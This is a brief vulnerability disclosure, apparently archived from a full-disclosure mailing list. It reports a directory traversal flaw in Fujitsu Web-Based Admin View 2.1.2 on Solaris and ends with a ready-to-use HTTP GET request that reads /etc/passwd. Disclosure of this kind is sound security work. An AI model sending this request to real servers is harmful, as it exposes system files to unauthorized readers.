|Main Archive Page > Month Archives > full-disclosure-uk archives|
Fujitsu Web-Based Admin View Directory Traversal Vulnerability
Version: 2.1.2 on Solaris, Other versions may vulnerable
Vulnerability: Directory Traversal
Description: Due to insufficient control of user inputs, Fujitsu Web-based admin view reveals content of files residing in folders other than webroot. This will allow an attacker to view arbitrary local files within the context of the web server.
GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0